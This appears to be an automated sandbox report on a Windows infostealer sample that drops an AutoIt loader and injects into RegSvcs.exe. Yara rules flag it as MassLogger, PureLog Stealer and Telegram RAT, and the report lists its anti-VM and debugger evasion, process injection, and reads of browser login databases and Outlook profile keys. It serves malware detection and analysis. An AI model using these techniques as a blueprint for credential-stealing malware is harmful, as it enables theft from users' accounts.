Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	API/Special instruction interceptor: Address: 1173FD4
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	API/Special instruction interceptor: Address: 1ADB2CC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-102218
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	API coverage: 4.9 %

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0068445A
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068C6D1 FindFirstFileW,FindClose,	0_2_0068C6D1
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0068C75C
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068EF95
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0068F0F2
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068F3F3
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_006837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006837EF
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_00683B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00683B12
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0068BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0068BCBC
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0104445A
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0104C75C
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104C6D1 FindFirstFileW,FindClose,	2_2_0104C6D1
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0104EF95
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0104F0F2
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0104F3F3
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_010437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_010437EF
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01043B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_01043B12
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0104BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0104BCBC

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006249A0

Source: RegSvcs.exe, 00000003.00000002.2745080973.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2745971842.000000000153A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	API call chain: ExitProcess graph end node	graph_0-101053
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	API call chain: ExitProcess graph end node	graph_0-101272
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00693F09 BlockInput,

0_2_00693F09

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00623B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623B3A

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00655A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00655A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

3_2_004019F0

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00624B37 LoadLibraryA,GetProcAddress,

0_2_00624B37

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_016AF1A0 mov eax, dword ptr fs:[00000030h]	0_2_016AF1A0
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_016B0870 mov eax, dword ptr fs:[00000030h]	0_2_016B0870
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_016B0810 mov eax, dword ptr fs:[00000030h]	0_2_016B0810
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01174240 mov eax, dword ptr fs:[00000030h]	2_2_01174240
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_011742A0 mov eax, dword ptr fs:[00000030h]	2_2_011742A0
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_01172BD0 mov eax, dword ptr fs:[00000030h]	2_2_01172BD0
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 5_2_01ADB538 mov eax, dword ptr fs:[00000030h]	5_2_01ADB538
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 5_2_01ADB598 mov eax, dword ptr fs:[00000030h]	5_2_01ADB598
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 5_2_01AD9EC8 mov eax, dword ptr fs:[00000030h]	5_2_01AD9EC8

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006780A9

Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0064A155
Source: C:\Users\user\Desktop\yqfze5TKW7.exe	Code function: 0_2_0064A124 SetUnhandledExceptionFilter,	0_2_0064A124
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100A124 SetUnhandledExceptionFilter,	2_2_0100A124
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Code function: 2_2_0100A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0100A155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 620008			Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11CE008			Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006787B1 LogonUserW,

0_2_006787B1

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00623B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623B3A

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_006248D7

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00684C7F mouse_event,

0_2_00684C7F

Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\yqfze5TKW7.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\underbalance\porcelainization.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\underbalance\porcelainization.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\underbalance\porcelainization.exe"	Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00677CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00677CAF

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0067874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0067874B

Source: yqfze5TKW7.exe, porcelainization.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: yqfze5TKW7.exe, porcelainization.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_0064862B cpuid

0_2_0064862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

3_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00654E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00654E87

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00661E06 GetUserNameW,

0_2_00661E06

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_00653F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00653F3A

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Code function: 0_2_006249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006249A0

Source: C:\Users\user\Desktop\yqfze5TKW7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.27d0ee8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2747119905.0000000003300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: porcelainization.exe	Binary or memory string: WIN_81
Source: porcelainization.exe	Binary or memory string: WIN_XP
Source: porcelainization.exe	Binary or memory string: WIN_XPe
Source: porcelainization.exe	Binary or memory string: WIN_VISTA
Source: porcelainization.exe	Binary or memory string: WIN_7
Source: porcelainization.exe	Binary or memory string: WIN_8
Source: porcelainization.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 3.2.RegSvcs.exe.39e6458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.3a0e390.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0ee8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.27d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.39e5570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.3300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2690ae6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.26919ce.0.raw.unpack, type: UNPACKEDPE
